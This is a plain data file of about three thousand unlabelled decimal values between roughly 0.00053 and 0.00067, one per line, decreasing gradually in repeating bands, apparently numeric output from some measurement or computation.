0.000662288
0.000657755
0.000653528
0.000657784
0.000653584
0.00065778
0.000653552
0.000657722
0.000657754
0.000653527
0.000657784
0.000653584
0.000657779
0.000653551
0.000657721
0.000640227
0.00064474
0.00064023
0.000644742
0.00064473
0.000649017
0.000649017
0.000649021
0.000644734
0.000644734
0.000640198
0.000636024
0.000640227
0.000635969
0.000640223
0.000640165
0.000635991
0.000640198
0.000636024
0.000640228
0.000635969
0.000640224
0.000640164
0.000635992
0.000644775
0.000649003
0.000648939
0.000644744
0.000648978
0.000644747
0.000644806
0.000644774
0.000649003
0.000648939
0.000644746
0.000648977
0.000644748
0.000644807
0.00064024
0.000635956
0.000635956
0.000640237
0.000640238
0.000635952
0.000657794
0.000657774
0.000653519
0.000653531
0.000657792
0.000657781
0.000653517
0.000662298
0.000666571
0.000662306
0.000666573
0.000662297
0.000662298
0.000662315
0.000666571
0.000666558
0.0006623
0.000666573
0.000662313
0.000657792
0.000653513
0.00065778
0.000657791
0.000653515
0.000644738
0.000649012
0.000648998
0.000644756
0.000649013
0.000644739
0.000644752
0.000640233
0.000640223
0.000635956
0.000635956
0.000640232
0.000644738
0.000649012
0.000644745
0.000649014
0.000644738
0.000640233
0.000640215
0.000635959
0.00063597
0.000635957
0.00064023
0.000640217
0.000644737
0.000649009
0.000648993
0.000644754
0.000649011
0.000644738
0.000644749
0.000640234
0.000640221
0.00063596
0.000640233
0.000635961
0.000644735
0.000649009
0.000644745
0.000649009
0.000644735
0.000640235
0.000640215
0.00063596
0.000635975
0.000640231
0.00064022
0.000635961
0.000657797
0.000653511
0.000653512
0.000657793
0.000657795
0.000653508
0.000662331
0.000666499
0.000666561
0.000662303
0.000662306
0.000666537
0.000662364
0.000662332
0.0006665
0.000666561
0.000662305
0.000662364
0.000666535
0.000662307
0.000662289
0.000666575
0.000666575
0.000662292
0.000666578
0.000662293
0.000657753
0.000653525
0.000657781
0.000653586
0.000657779
0.000657723
0.000653551
0.000657755
0.000653527
0.000657785
0.000653586
0.000657723
0.000657781
0.000653552
0.000662302
0.000657788
0.000640226
0.000644741
0.00064473
0.000649015
0.000649017
0.000649019
0.000644733
0.000644733
0.000640198
0.000636026
0.000640224
0.000635967
0.000640164
0.000640222
0.000635991
0.000640199
0.000636027
0.000640225
0.000635967
0.000640222
0.000640166
0.000635992
0.000644775
0.000649001
0.000648939
0.000644745
0.000644806
0.000648976
0.000644748
0.000644774
0.000649003
0.00064894
0.000644746
0.000648976
0.000644748
0.000644808
0.00064024
0.000635953
0.000635953
0.000640236
0.000640236
0.00063595
0.000640228
0.000644743
0.000657791
0.000657772
0.000653517
0.000653532
0.000657788
0.000657775
0.000653518
0.000662294
0.000666568
0.000662302
0.00066657
0.000662293
0.000662294
0.00066231
0.00066657
0.000666552
0.000662296
0.00066657
0.000662308
0.00065779
0.000653516
0.000657778
0.000657787
0.000653517
0.00064474
0.000648996
0.000649012
0.000644756
0.000649013
0.000644753
0.000644742
0.000640237
0.000640224
0.000635961
0.000635962
0.000640236
0.000644739
0.000649012
0.000644747
0.000649013
0.000644738
0.000640238
0.000640216
0.000635975
0.000635963
0.000635963
0.000640221
0.000640235
0.00064474
0.000649012
0.000648998
0.000644756
0.000649014
0.000644741
0.000644755
0.000640237
0.000640224
0.00063596
0.000640235
0.000635962
0.000644739
0.000649012
0.000644748
0.000649014
0.000644739
0.000640237
0.000640218
0.000635963
0.000635973
0.000640234
0.000640222
0.000635962
0.000657794
0.000657773
0.000653531
0.00065352
0.000657778
0.000657791
0.000653519
0.000662298
0.000666573
0.000662306
0.000662296
0.000666574
0.000662298
0.000662316
0.000666557
0.000666573
0.000662313
0.000666574
0.0006623
0.000657794
0.000653518
0.000657781
0.000657792
0.000653519
0.000657797
0.000657778
0.000653521
0.000653533
0.000657794
0.000657782
0.00065352
0.000662301
0.000666575
0.000662309
0.000666575
0.000662301
0.0006623
0.000662318
0.000666573
0.000666558
0.000666576
0.000662302
0.000662315
0.000657797
0.000653519
0.000657786
0.000657797
0.000653521
0.000644739
0.000648998
0.000649012
0.000644757
0.000649014
0.000644752
0.000644742
0.000640234
0.000640222
0.000635959
0.000640233
0.00063596
0.000644739
0.000649014
0.000644748
0.000649015
0.000644738
0.000640235
0.000640219
0.000635973
0.000635963
0.000640218
0.000640234
0.000635961
0.000644738
0.000649013
0.000648997
0.000644755
0.000649014
0.000644742
0.000644751
0.000640235
0.000640225
0.000635959
0.000640235
0.000635959
0.000644738
0.000649013
0.000644748
0.000649014
0.000644738
0.000640234
0.000640218
0.00063596
0.000635973
0.000640233
0.000640221
0.000635958
0.000657793
0.000653508
0.000653509
0.00065779
0.000657791
0.000653505
0.000662327
0.000666494
0.000666556
0.0006623
0.000662302
0.000666529
0.00066236
0.000662328
0.000666496
0.000666559
0.000662302
0.00066236
0.000666531
0.000662304
0.000662285
0.000666571
0.000666572
0.000662288
0.000666574
0.000662289
0.000657752
0.000653522
0.000657781
0.000653585
0.000657777
0.00065772
0.000653549
0.000657751
0.000653524
0.000657781
0.000653583
0.000657721
0.000657777
0.000653549
0.000662299
0.000657784
0.000640229
0.000644741
0.00064473
0.000649013
0.000649013
0.000649017
0.000644732
0.000644732
0.000640199
0.000636026
0.000640227
0.000635969
0.000640164
0.000640223
0.000635995
0.000640199
0.000636026
0.000640224
0.000635969
0.000640223
0.000640163
0.000635995
0.000644775
0.000648999
0.000648939
0.000644745
0.000644806
0.000648974
0.000644747
0.000644774
0.000649001
0.000648938
0.000644742
0.000648975
0.000644747
0.000644806
0.000640241
0.000635954
0.000635954
0.000640236
0.000640236
0.000635951
0.000640227
0.00064474
0.000657792
0.00065777
0.000653532
0.000653517
0.000657777
0.00065779
0.000653517
0.000662297
0.000666571
0.000662305
0.000662296
0.000666573
0.000662297
0.000662315
0.000666557
0.000666574
0.000662311
0.000666573
0.000662301
0.000657792
0.000653515
0.000657781
0.000657791
0.000653517
0.000657791
0.000657773
0.000653529
0.000653518
0.000657773
0.00065779
0.000653517
0.000662296
0.000666571
0.000662306
0.000666573
0.000662296
0.000662295
0.000662312
0.000666554
0.000666572
0.000666572
0.000662309
0.000662299
0.000657791
0.000653515
0.000657781
0.000657789
0.000653516
0.000644736
0.000648995
0.00064901
0.000644751
0.000649012
0.00064475
0.000644738
0.000640232
0.00064022
0.000635956
0.000640232
0.000635957
0.000644736
0.00064901
0.000644744
0.000649012
0.000644735
0.000640233
0.000640216
0.00063597
0.000635959
0.000640218
0.000640231
0.000635957
0.000644737
0.000648993
0.000649011
0.000644754
0.000649012
0.00064475
0.000644739
0.000640234
0.000640221
0.000635959
0.000640233
0.000635959
0.000644736
0.00064901
0.000644745
0.000649012
0.000644736
0.000640234
0.000640215
0.000635974
0.00063596
0.000640218
0.000640231
0.000635959
0.000662304
0.000657789
0.000662301
0.000657786
0.00064473
0.000649015
0.000649015
0.000649018
0.000644733
0.000644733
0.000640197
0.000636026
0.000640227
0.000635968
0.000635993
0.000640165
0.000640222
0.000640197
0.000636025
0.000640224
0.000635967
0.000635993
0.000640163
0.000640222
0.000644772
0.000649
0.000648942
0.000644745
0.000648975
0.000644806
0.000644747
0.000644772
0.000649002
0.000648935
0.000644744
0.000648974
0.000644803
0.000644748
0.000640239
0.000635953
0.000635953
0.00063595
0.000640235
0.000640235
0.00064023
0.000644742
0.000640225
0.00064474
0.000627181
0.000622666
0.000627181
0.000622666
0.000622678
0.000618392
0.000618393
0.000622675
0.000622675
0.000618389
0.000627212
0.000631379
0.000631444
0.000627184
0.000631414
0.000627188
0.000627244
0.000627212
0.000631379
0.000631443
0.000627184
0.000631415
0.000627187
0.000627245
0.00062717
0.000631458
0.000631458
0.000631461
0.000627173
0.000627173
0.000622636
0.000618406
0.000622664
0.000618466
0.000622661
0.000618433
0.000622604
0.000622636
0.000618407
0.000622665
0.000618467
0.00062266
0.000618433
0.000622605
0.000605106
0.00060962
0.000605108
0.000609622
0.000609611
0.000613896
0.000613897
0.0006139
0.000609614
0.000609615
0.000605079
0.000600906
0.000605105
0.000600846
0.000605102
0.000605046
0.000600871
0.000605078
0.000600908
0.000605107
0.000600848
0.000605103
0.000605046
0.000600872
0.000609656
0.000613882
0.00061382
0.000609625
0.000613858
0.000609628
0.000609688
0.000609656
0.000613883
0.000613821
0.000609625
0.000613858
0.000609628
0.000609688
0.00060512
0.000600833
0.000600834
0.000605117
0.000605118
0.00060083
0.000622676
0.000622656
0.000618404
0.000618413
0.000622674
0.000622661
0.000618402
0.00062718
0.000631455
0.000627189
0.000631456
0.000627179
0.000627179
0.000627196
0.000631453
0.000631439
0.000627181
0.000631455
0.000627194
0.000622677
0.0006184
0.000622665
0.000622676
0.000618402
0.000609618
0.000613894
0.000613876
0.000609637
0.000613893
0.000609621
0.000609633
0.000605113
0.000605101
0.000600835
0.000600837
0.000605112
0.000609617
0.000613891
0.000609625
0.000613893
0.000609616
0.000605113
0.000605096
0.000600838
0.000600848
0.000600837
0.000605111
0.000605097
0.000609619
0.000613894
0.000613876
0.000609634
0.000613896
0.00060962
0.000609629
0.000605111
0.0006051
0.000600833
0.00060511
0.000600835
0.000609618
0.000613895
0.000609626
0.000613896
0.000609618
0.000605112
0.000605094
0.000600836
0.000600847
0.00060511
0.000605094
0.000600835
0.000622679
0.000618394
0.000618393
0.000622676
0.000622676
0.000618391
0.000627215
0.00063138
0.000631442
0.000627188
0.000627188
0.000631416
0.000627245
0.000627213
0.000631381
0.000631442
0.000627186
0.000627246
0.000631416
0.000627188
0.00062717
0.000631456
0.000631456
0.000627173
0.000631459
0.000627173
0.000622637
0.000618409
0.000622667
0.000618468
0.000622663
0.000622604
0.000618435
0.000622636
0.000618406
0.000622664
0.000618469
0.000622605
0.000622661
0.000618433
0.000627182
0.000622666
0.000605107
0.000609622
0.000609614
0.000613898
0.000613897
0.000613902
0.000609616
0.000609616
0.000605082
0.000600907
0.000605106
0.000600846
0.000605046
0.000605104
0.000600872
0.000605082
0.000600908
0.000605109
0.000600849
0.000605104
0.000605047
0.000600874
0.000609658
0.000613886
0.00061382
0.000609627
0.000609688
0.00061386
0.000609631
0.000609659
0.000613883
0.000613822
0.000609629
0.00061386
0.00060963
0.000609689
0.000605122
0.000600833
0.000600835
0.000605117
0.000605118
0.00060083
0.000605111
0.000609625
0.000622677
0.000622658
0.000618402
0.000618414
0.000622674
0.00062266
0.000618402
0.00062718
0.000631453
0.000627188
0.000631456
0.000627179
0.000627181
0.000627196
0.000631455
0.000631435
0.000627182
0.000631456
0.000627193
0.000622677
0.0006184
0.000622665
0.000622676
0.000618402
0.000609619
0.000613876
0.000613894
0.000609636
0.000613894
0.000609633
0.000609621
0.000605116
0.000605105
0.000600841
0.000600842
0.000605115
0.000609619
0.000613892
0.000609627
0.000613894
0.000609619
0.000605117
0.000605099
0.000600858
0.000600843
0.000600843
0.000605103
0.000605113
0.00060962
0.000613893
0.000613878
0.000609636
0.000613895
0.000609621
0.000609633
0.000605117
0.000605104
0.000600842
0.000605115
0.000600844
0.00060962
0.000613893
0.000609627
0.000613896
0.000609619
0.000605117
0.000605098
0.000600843
0.000600857
0.000605114
0.000605101
0.000600844
0.000622673
0.000622658
0.000618415
0.000618401
0.00062266
0.000622672
0.0006184
0.000627179
0.000631455
0.000627188
0.000627179
0.000631455
0.000627178
0.000627198
0.000631439
0.000631455
0.000627194
0.000631455
0.000627181
0.000622674
0.000618399
0.000622661
0.000622674
0.000618399
0.000622672
0.000622655
0.000618401
0.000618413
0.000622673
0.000622656
0.000618398
0.000627176
0.000631452
0.000627186
0.000631453
0.000627175
0.000627176
0.000627197
0.000631453
0.000631437
0.000631452
0.00062718
0.000627191
0.000622672
0.000618398
0.000622662
0.000622672
0.000618399
0.000609622
0.000613881
0.000613896
0.000609641
0.000613897
0.000609636
0.000609625
0.000605116
0.000605106
0.00060084
0.000605116
0.00060084
0.00060962
0.000613894
0.00060963
0.000613895
0.00060962
0.000605116
0.0006051
0.000600854
0.000600842
0.000605102
0.000605114
0.000600839
0.000609622
0.000613895
0.000613881
0.00060964
0.000613895
0.000609625
0.000609638
0.00060512
0.000605111
0.000600845
0.00060512
0.000600846
0.000609622
0.000613895
0.000609632
0.000613896
0.000609622
0.00060512
0.000605103
0.000600843
0.00060086
0.000605116
0.000605107
0.000600845
0.000622679
0.000618395
0.000618394
0.000622677
0.000622675
0.000618391
0.000627214
0.000631381
0.000631442
0.000627187
0.000627189
0.000631418
0.000627246
0.000627212
0.000631382
0.000631443
0.000627183
0.000627245
0.000631418
0.000627187
0.00062717
0.000631457
0.000631457
0.000627174
0.00063146
0.000627173
0.000622637
0.00061841
0.000622668
0.000618468
0.000622664
0.000622605
0.000618433
0.000622635
0.000618407
0.000622663
0.000618465
0.000622602
0.00062266
0.000618431
0.00062718
0.000622666
0.00060511
0.000609624
0.000609612
0.000613899
0.000613898
0.000613903
0.000609616
0.000609614
0.000605079
0.00060091
0.000605107
0.00060085
0.000605048
0.000605102
0.000600876
0.000605078
0.00060091
0.000605105
0.000600849
0.000605101
0.000605047
0.000600875
0.000609658
0.000613886
0.00061382
0.000609628
0.000609689
0.00061386
0.00060963
0.000609656
0.000613883
0.000613818
0.000609624
0.000613857
0.000609628
0.000609687
0.000605119
0.000600836
0.000600835
0.000605116
0.000605115
0.000600832
0.000605107
0.00060962
0.000622671
0.000622653
0.000618408
0.000618397
0.000622655
0.000622669
0.000618396
0.000627175
0.000631451
0.000627186
0.000627174
0.000631452
0.000627174
0.000627193
0.00063143
0.000631449
0.000627187
0.000631449
0.000627177
0.000622672
0.000618394
0.00062266
0.00062267
0.000618396
0.000622673
0.000622653
0.000618409
0.000618398
0.000622656
0.00062267
0.000618397
0.000627177
0.00063145
0.000627186
0.000631452
0.000627176
0.000627177
0.000627193
0.000631435
0.00063145
0.000631452
0.000627191
0.000627178
0.000622673
0.000618397
0.000622661
0.000622672
0.000618397
0.000609617
0.000613872
0.000613888
0.000609631
0.000613891
0.000609629
0.000609618
0.000605115
0.000605104
0.000600839
0.000605113
0.000600841
0.000609617
0.000613889
0.000609625
0.000613891
0.000609615
0.000605115
0.000605093
0.000600854
0.000600839
0.000605099
0.000605112
0.00060084
0.000609614
0.00061387
0.000613889
0.000609635
0.00061389
0.000609629
0.000609619
0.000605112
0.000605103
0.000600837
0.00060511
0.000600839
0.000609615
0.000613889
0.000609626
0.000613891
0.000609615
0.00060511
0.000605095
0.000600851
0.000600839
0.000605096
0.000605111
0.000600837
0.000627183
0.000622669
0.000627182
0.000622667
0.000609617
0.000613901
0.000613899
0.000613904
0.00060962
0.000609619
0.000605087
0.00060091
0.000605116
0.000600858
0.000600883
0.000605048
0.000605112
0.000605084
0.000600912
0.000605108
0.000600853
0.000600881
0.000605051
0.000605107
0.000609661
0.000613888
0.000613823
0.000609632
0.000613862
0.00060969
0.000609635
0.00060966
0.000613885
0.000613825
0.000609628
0.000613861
0.000609693
0.000609633
0.000605127
0.000600842
0.00060084
0.000600839
0.000605124
0.000605122
0.000605118
0.000609628
0.000605109
0.000609623
0.000592061
0.000587549
0.000592065
0.000587552
0.000587559
0.000583275
0.000583275
0.000587556
0.000587557
0.000583272
0.000592093
0.000596262
0.000596321
0.000592063
0.000596298
0.000592067
0.000592126
0.000592095
0.000596262
0.000596323
0.000592068
0.000596298
0.000592069
0.000592126
0.000592051
0.000596335
0.000596336
0.000596339
0.000592053
0.000592054
0.000587516
0.00058329
0.000587546
0.000583344
0.000587543
0.000583313
0.000587483
0.000587517
0.00058329
0.000587549
0.000583347
0.000587544
0.000583314
0.000587485
0.000569989
0.000574504
0.000569987
0.000574504
0.000574492
0.000578779
0.000578779
0.000578782
0.000574496
0.000574496
0.00056996
0.000565788
0.000569987
0.000565731
0.000569985
0.000569923
0.000565755
0.000569959
0.000565787
0.000569986
0.000565728
0.000569983
0.000569927
0.000565753
0.000574536
0.000578765
0.000578697
0.000574507
0.000578739
0.00057451
0.000574565
0.000574536
0.000578766
0.0005787
0.000574508
0.00057874
0.00057451
0.000574567
0.000570001
0.000565716
0.000565715
0.000569998
0.000569998
0.000565713
0.000587552
0.000587535
0.000583279
0.000583291
0.00058755
0.000587538
0.000583279
0.000592056
0.000596328
0.000592064
0.00059633
0.000592055
0.000592055
0.000592074
0.000596328
0.000596312
0.000592057
0.00059633
0.00059207
0.000587553
0.000583278
0.00058754
0.000587551
0.00058328
0.000574497
0.000578771
0.000578758
0.000574515
0.000578774
0.0005745
0.000574512
0.000569993
0.000569982
0.000565716
0.000565716
0.000569991
0.000574497
0.000578773
0.000574507
0.000578774
0.000574498
0.000569992
0.000569975
0.00056572
0.000565731
0.000565717
0.000569992
0.000569978
0.0005745
0.000578772
0.000578758
0.000574516
0.000578775
0.000574501
0.000574513
0.000569995
0.000569983
0.000565717
0.000569993
0.000565719
0.0005745
0.000578775
0.000574508
0.000578776
0.000574499
0.000569995
0.000569976
0.00056572
0.000565732
0.000569992
0.000569979
0.000565719
0.000587562
0.000583276
0.000583278
0.000587557
0.000587559
0.000583274
0.000592093
0.00059626
0.00059632
0.000592064
0.000592067
0.000596292
0.000592125
0.000592095
0.000596261
0.000596324
0.000592067
0.000592126
0.000596297
0.00059207
0.000592052
0.000596335
0.000596338
0.000592054
0.000596339
0.000592056
0.000587519
0.00058329
0.000587546
0.000583349
0.000587542
0.000587484
0.000583315
0.000587518
0.000583292
0.000587547
0.000583348
0.000587484
0.000587546
0.000583315
0.000592063
0.000587549
0.000569989
0.000574504
0.000574494
0.000578779
0.00057878
0.000578784
0.000574496
0.000574497
0.000569961
0.000565785
0.000569987
0.000565729
0.000569925
0.000569984
0.000565755
0.000569964
0.000565792
0.00056999
0.00056573
0.000569987
0.00056993
0.000565757
0.000574537
0.000578765
0.000578704
0.000574508
0.00057457
0.00057874
0.00057451
0.000574538
0.000578767
0.000578703
0.000574509
0.000578739
0.000574512
0.000574571
0.000570003
0.000565715
0.000565715
0.000569998
0.000569999
0.000565712
0.000569991
0.000574504
0.000587562
0.000587541
0.000583287
0.000583298
0.000587559
0.000587545
0.000583287
0.000592066
0.00059634
0.000592073
0.000596341
0.000592067
0.000592065
0.000592081
0.000596337
0.000596322
0.000592066
0.000596339
0.000592079
0.000587562
0.000583285
0.000587548
0.00058756
0.000583287
0.000574498
0.00057876
0.000578776
0.000574517
0.000578776
0.000574513
0.000574502
0.000569992
0.000569981
0.000565715
0.000565717
0.000569991
0.000574498
0.000578775
0.000574509
0.000578776
0.000574498
0.000569992
0.000569978
0.000565731
0.000565721
0.000565716
0.000569977
0.000569993
0.0005745
0.000578777
0.000578761
0.000574517
0.000578778
0.000574503
0.000574515
0.000569995
0.000569986
0.000565718
0.000569994
0.000565719
0.0005745
0.000578778
0.00057451
0.00057878
0.0005745
0.000569995
0.000569975
0.00056572
0.000565733
0.000569993
0.000569979
0.000565719
0.000587554
0.000587536
0.000583293
0.00058328
0.000587539
0.000587552
0.000583279
0.000592058
0.000596335
0.000592068
0.000592058
0.000596335
0.000592057
0.000592077
0.000596315
0.000596333
0.000592071
0.000596332
0.000592059
0.000587554
0.000583278
0.000587544
0.000587554
0.000583279
0.000587555
0.000587534
0.000583279
0.000583291
0.000587552
0.000587539
0.000583279
0.000592063
0.000596341
0.000592072
0.000596341
0.000592063
0.000592061
0.000592078
0.000596335
0.000596323
0.000596339
0.000592062
0.000592075
0.000587559
0.000583282
0.000587547
0.000587559
0.000583283
0.000574498
0.000578756
0.000578771
0.000574515
0.000578773
0.000574511
0.0005745
0.000569995
0.000569986
0.00056572
0.000569994
0.000565721
0.000574498
0.000578772
0.000574509
0.000578773
0.000574497
0.000569995
0.000569977
0.000565735
0.000565721
0.000569979
0.000569993
0.000565721
0.000574498
0.00057877
0.000578755
0.000574516
0.000578773
0.000574499
0.000574512
0.000569994
0.000569983
0.000565716
0.000569992
0.000565719
0.000574498
0.000578774
0.000574506
0.000578775
0.000574497
0.000569995
0.000569978
0.00056572
0.000565733
0.000569993
0.000569981
0.000565719
0.000587562
0.000583278
0.000583277
0.000587559
0.000587559
0.000583274
0.000592098
0.000596263
0.000596327
0.00059207
0.000592072
0.0005963
0.000592131
0.000592097
0.000596265
0.000596325
0.000592068
0.000592128
0.000596299
0.000592071
0.000592054
0.000596341
0.00059634
0.000592058
0.000596343
0.000592057
0.000587521
0.000583292
0.000587549
0.000583352
0.000587545
0.000587492
0.000583317
0.00058752
0.00058329
0.000587547
0.000583347
0.000587485
0.000587544
0.000583316
0.000592065
0.000587549
0.000569993
0.000574507
0.000574497
0.000578783
0.000578782
0.000578786
0.0005745
0.0005745
0.000569962
0.00056579
0.00056999
0.00056573
0.000569927
0.000569987
0.000565757
0.000569961
0.000565787
0.000569989
0.000565732
0.000569987
0.000569923
0.000565757
0.000574539
0.000578769
0.000578701
0.000574511
0.000574569
0.000578741
0.000574514
0.000574538
0.000578766
0.0005787
0.000574507
0.00057874
0.000574513
0.000574566
0.000570005
0.000565717
0.000565717
0.000570001
0.000570001
0.000565714
0.000569991
0.000574503
0.000587553
0.000587534
0.000583291
0.000583279
0.000587535
0.00058755
0.000583279
0.000592058
0.000596333
0.000592069
0.000592057
0.000596335
0.000592057
0.000592073
0.000596317
0.000596329
0.000592071
0.000596333
0.000592058
0.000587554
0.000583277
0.000587542
0.000587551
0.00058328
0.000587553
0.000587535
0.000583293
0.000583279
0.000587538
0.00058755
0.000583278
0.000592059
0.000596333
0.000592068
0.000596335
0.00059206
0.000592057
0.000592076
0.000596314
0.000596331
0.000596332
0.000592072
0.000592058
0.000587555
0.000583277
0.000587543
0.000587553
0.000583279
0.0005745
0.000578756
0.000578772
0.000574516
0.000578775
0.000574513
0.000574502
0.000569995
0.000569983
0.000565718
0.000569995
0.000565719
0.000574499
0.000578772
0.000574506
0.000578774
0.000574498
0.000569995
0.000569978
0.000565731
0.000565721
0.000569978
0.000569994
0.000565719
0.000574499
0.000578756
0.000578771
0.000574517
0.000578773
0.000574514
0.000574502
0.000569995
0.000569982
0.00056572
0.000569993
0.000565721
0.000574499
0.000578772
0.000574506
0.000578774
0.000574498
0.000569996
0.000569979
0.000565736
0.000565722
0.000569981
0.000569994
0.000565721
0.000592068
0.000587551
0.000592064
0.000587548
0.00057449
0.000578778
0.000578778
0.00057878
0.000574494
0.000574493
0.000569955
0.000565785
0.000569983
0.000565725
0.00056575
0.000569923
0.000569981
0.000569957
0.000565784
0.000569985
0.000565724
0.000565751
0.000569922
0.00056998
0.000574532
0.000578763
0.000578698
0.000574504
0.000578734
0.000574564
0.000574508
0.000574531
0.000578762
0.000578695
0.000574503
0.000578734
0.000574563
0.000574506
0.000569998
0.00056571
0.000565711
0.000565707
0.000569994
0.000569994
0.000569986
0.000574501
0.000569986
0.0005745
0.000556943
0.000552428
0.000556941
0.000552427
0.000552436
0.00054815
0.000548151
0.000552434
0.000552434
0.000548148
0.000556974
0.000561144
0.000561204
0.000556947
0.00056118
0.000556947
0.000557008
0.000556972
0.000561141
0.000561202
0.000556944
0.000561177
0.000556946
0.000557005
0.000556928
0.000561218
0.000561217
0.000561221
0.000556933
0.000556932
0.000552394
0.000548164
0.000552426
0.000548226
0.00055242
0.00054819
0.000552366
0.000552393
0.000548166
0.000552424
0.000548223
0.00055242
0.000548189
0.000552362
0.000534862
0.000539377
0.000534865
0.000539381
0.000539367
0.000543652
0.000543653
0.000543657
0.000539369
0.00053937
0.000534833
0.000530657
0.000534859
0.0005306
0.000534856
0.000534798
0.000530625
0.000534835
0.00053066
0.000534862
0.0005306
0.000534858
0.000534798
0.000530626
0.00053941
0.000543638
0.000543576
0.000539379
0.000543613
0.000539383
0.000539442
0.000539413
0.000543641
0.000543575
0.000539385
0.000543614
0.000539385
0.000539441
0.000534875
0.000530586
0.000530586
0.00053487
0.000534871
0.000530583
0.000552434
0.000552414
0.000548157
0.00054817
0.00055243
0.00055242
0.000548157
0.00055694
0.000561213
0.000556947
0.000561215
0.00055694
0.000556938
0.000556956
0.000561212
0.000561196
0.000556939
0.000561214
0.000556953
0.000552435
0.000548157
0.000552423
0.000552435
0.000548158
0.000539375
0.00054365
0.000543635
0.000539394
0.000543651
0.000539378
0.000539388
0.000534871
0.000534858
0.000530592
0.000530593
0.000534869
0.000539376
0.00054365
0.000539382
0.000543652
0.000539375
0.00053487
0.000534853
0.000530593
0.000530605
0.000530592
0.000534868
0.000534853
0.000539373
0.000543649
0.000543634
0.000539392
0.000543651
0.000539377
0.000539386
0.000534866
0.000534857
0.000530589
0.000534866
0.00053059
0.000539374
0.000543651
0.000539383
0.000543652
0.000539374
0.000534866
0.000534853
0.000530593
0.000530603
0.000534867
0.000534852
0.00053059
0.000552439
0.000548153
0.000548153
0.000552436
0.000552436
0.000548151
0.000556972
0.000561138
0.000561202
0.000556945
0.000556948
0.000561176
0.000557003
0.000556973
0.000561146
0.000561203
0.000556946
0.000557006
0.000561178
0.000556949
0.00055693
0.000561217
0.000561217
0.000556934
0.000561219
0.000556934
0.000552395
0.000548167
0.000552426
0.000548224
0.000552422
0.00055236
0.000548192
0.000552396
0.000548168
0.000552424
0.000548222
0.000552361
0.000552422
0.000548193
0.000556943
0.000552426
0.000534863
0.000539378
0.000539367
0.000543655
0.000543655
0.000543659
0.000539371
0.00053937
0.00053483
0.000530654
0.000534861
0.000530599
0.000534795
0.000534857
0.000530621
0.000534828
0.000530654
0.000534855
0.000530595
0.000534854
0.000534794
0.000530619
0.000539411
0.00054364
0.000543576
0.000539383
0.000539441
0.000543615
0.000539384
0.000539409
0.000543642
0.000543572
0.000539381
0.000543616
0.000539384
0.000539438
0.000534873
0.000530585
0.000530582
0.000534871
0.000534869
0.00053058
0.000534856
0.000539375
0.000552428
0.000552411
0.000548154
0.000548166
0.000552427
0.000552414
0.000548151
0.000556933
0.000561209
0.000556944
0.00056121
0.000556933
0.000556934
0.000556954
0.000561211
0.000561196
0.000556936
0.000561211
0.00055695
0.000552428
0.000548151
0.000552418
0.000552428
0.000548151
0.000539372
0.000543632
0.000543645
0.000539385
0.000543648
0.000539386
0.000539372
0.000534868
0.000534858
0.000530591
0.000530592
0.000534868
0.000539373
0.00054365
0.000539384
0.00054365
0.000539373
0.000534868
0.000534848
0.000530607
0.000530592
0.000530592
0.000534854
0.000534864
0.000539367
0.000543645
0.000543627
0.000539389
0.000543643
0.000539372
0.000539383
0.000534862
0.000534854
0.000530589
0.000534863
0.000530588
0.000539366
0.000543645
0.000539379
0.000543644
0.000539368
0.000534862
0.00053485
0.000530591
0.000530603
0.000534864
0.000534849
0.000530588
0.00055243
0.000552408
0.000548167
0.000548154
0.000552414
0.000552428
0.000548154
0.00055694
0.000561216
0.000556948
0.000556941
0.000561216
0.000556937
0.000556952
0.000561198
0.000561212
0.000556952
0.000561215
0.000556938
0.000552432
0.000548154
0.00055242
0.000552432
0.000548156
0.000552428
0.000552409
0.000548153
0.000548162
0.000552427
0.000552412
0.00054815
0.000556934
0.00056121
0.000556943
0.000561212
0.000556933
0.000556934
0.000556952
0.000561211
0.000561195
0.000561212
0.000556937
0.000556948
0.000552428
0.000548147
0.000552417
0.000552427
0.00054815
0.00053937
0.000543633
0.000543645
0.000539387
0.000543648
0.000539385
0.000539371
0.000534863
0.000534854
0.000530585
0.000534863
0.000530586
0.000539371
0.00054365
0.000539383
0.00054365
0.000539372
0.000534863
0.000534848
0.000530601
0.000530588
0.000534849
0.000534861
0.000530586
0.000539368
0.000543644
0.000543626
0.000539386
0.000543644
0.000539371
0.000539382
0.000534863
0.000534852
0.000530587
0.000534864
0.000530587
0.000539366
0.000543639
0.000539374
0.000543641
0.000539365
0.000534865
0.000534848
0.00053059
0.000530605
0.000534862
0.000534851
0.000530589
0.000552435
0.000548149
0.000548147
0.000552433
0.000552432
0.000548144
0.000556973
0.000561144
0.000561202
0.000556944
0.000556947
0.000561179
0.000557005
0.000556975
0.000561143
0.000561204
0.000556946
0.000557005
0.00056118
0.000556948
0.00055693
0.000561217
0.000561218
0.000556933
0.000561221
0.000556933
0.000552391
0.000548163
0.000552422
0.00054822
0.000552419
0.000552358
0.000548186
0.000552392
0.00054816
0.000552422
0.000548223
0.000552363
0.000552417
0.000548185
0.000556941
0.000552423
0.00053486
0.000539375
0.000539365
0.000543652
0.000543651
0.000543654
0.000539368
0.000539368
0.000534829
0.000530659
0.000534857
0.000530602
0.000534796
0.000534855
0.000530627
0.00053483
0.000530659
0.000534859
0.000530602
0.000534856
0.000534796
0.000530626
0.000539408
0.000543638
0.000543571
0.000539379
0.000539439
0.00054361
0.000539383
0.000539407
0.000543636
0.000543572
0.000539378
0.000543609
0.000539382
0.000539439
0.000534873
0.000530587
0.000530588
0.00053487
0.00053487
0.000530585
0.00053486
0.000539376
0.000552427
0.000552409
0.000548167
0.000548155
0.000552413
0.000552427
0.000548152
0.000556934
0.000561213
0.000556946
0.000556935
0.000561212
0.000556933
0.000556952
0.000561194
0.000561211
0.000556948
0.000561212
0.000556937
0.000552428
0.000548151
0.000552418
0.000552429
0.000548151
0.000552431
0.000552408
0.000548167
0.000548155
0.000552414
0.000552427
0.000548155
0.000556938
0.000561213
0.000556946
0.000561215
0.000556938
0.000556937
0.000556953
0.000561196
0.000561212
0.000561213
0.000556952
0.000556938
0.000552433
0.000548156
0.000552421
0.000552431
0.000548157
0.000539367
0.000543629
0.000543644
0.000539387
0.000543644
0.000539385
0.00053937
0.000534863
0.000534854
0.000530588
0.000534863
0.000530588
0.000539367
0.000543644
0.000539379
0.000543644
0.000539367
0.000534863
0.000534846
0.000530606
0.000530591
0.000534852
0.000534862
0.000530589
0.000539374
0.00054363
0.000543646
0.00053939
0.000543648
0.000539388
0.000539374
0.000534871
0.000534856
0.000530591
0.000534869
0.000530593
0.000539375
0.000543649
0.000539381
0.000543651
0.000539374
0.000534869
0.00053485
0.000530607
0.000530592
0.000534854
0.000534865
0.000530592
0.000556937
